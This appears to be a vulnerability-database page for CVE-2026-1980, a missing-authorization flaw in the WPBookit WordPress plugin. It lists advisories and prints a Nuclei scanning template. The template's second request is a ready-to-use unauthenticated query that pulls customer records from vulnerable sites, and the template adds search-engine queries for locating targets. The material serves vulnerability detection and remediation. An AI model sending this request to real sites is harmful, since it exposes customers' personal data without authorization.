| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2026-1980 | 4 Mar 202601:21 | – | attackerkb | |
| CVE-2026-1980 | 4 Mar 202604:36 | – | circl | |
| WordPress plugin WPBookit 信息泄露漏洞 | 4 Mar 202600:00 | – | cnnvd | |
| CVE-2026-1980 | 4 Mar 202601:21 | – | cve | |
| CVE-2026-1980 WPBookit <= 1.0.8 - Missing Authorization to Unauthenticated Sensitive Customer Data Exposure | 4 Mar 202601:21 | – | cvelist | |
| EUVD-2026-9352 | 4 Mar 202603:31 | – | euvd | |
| CVE-2026-1980 | 4 Mar 202602:15 | – | nvd | |
| WordPress WPBookit plugin <= 1.0.8 - Missing Authorization to Unauthenticated Sensitive Customer Data Exposure vulnerability | 3 Mar 202623:45 | – | patchstack | |
| PT-2026-22859 | 4 Mar 202600:00 | – | ptsecurity | |
| CVE-2026-1980 | 5 Mar 202601:57 | – | redhatcve |
id: CVE-2026-1980
info:
name: WPBookit <= 1.0.8 - Unauthenticated Customer Information Disclosure
author: aryu-ru
severity: medium
description: |
WPBookit WordPress plugin <= 1.0.8 contains an information disclosure vulnerability caused by missing authorization check on 'get_customer_list' route, letting unauthenticated attackers retrieve sensitive customer data.
impact: |
Unauthenticated attackers can access sensitive customer information, risking privacy and data exposure.
remediation: |
Update to the latest version beyond 1.0.8.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/a1867c79-29d7-46a4-bfaf-c65e8a44c2ed?source=cve
- https://plugins.trac.wordpress.org/browser/wpbookit/tags/1.0.8/core/admin/classes/class.wpb-admin-routes.php#L146
- https://nvd.nist.gov/vuln/detail/CVE-2026-1980
- https://wordpress.org/plugins/wpbookit/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2026-1980
cwe-id: CWE-200
metadata:
verified: true
max-request: 2
vendor: iqonicdesign
product: wpbookit
publicwww-query: "/wp-content/plugins/wpbookit/"
fofa-query: body="/wp-content/plugins/wpbookit/"
tags: cve,cve2026,wordpress,wp-plugin,wpbookit,unauth,disclosure
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "WPBookit")'
condition: and
internal: true
extractors:
- type: regex
name: lsversion
group: 1
internal: true
regex:
- '(?i)Stable tag:\s*([\w.]+)'
- raw:
- |
GET /wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&length=1&start=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "recordsTotal", "recordsFiltered", "user_registred")'
- 'compare_versions(lsversion, ">= 1.0", "<= 1.0.8")'
condition: and
# digest: 4a0a0047304502204e1a904a637a19220bf4e32e04a879568781404ba163eeeceb9e132331baa77c02210080ded69ff9a413de738209970c9bc5d5ceec030b64f33371b0c025693c5be92b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation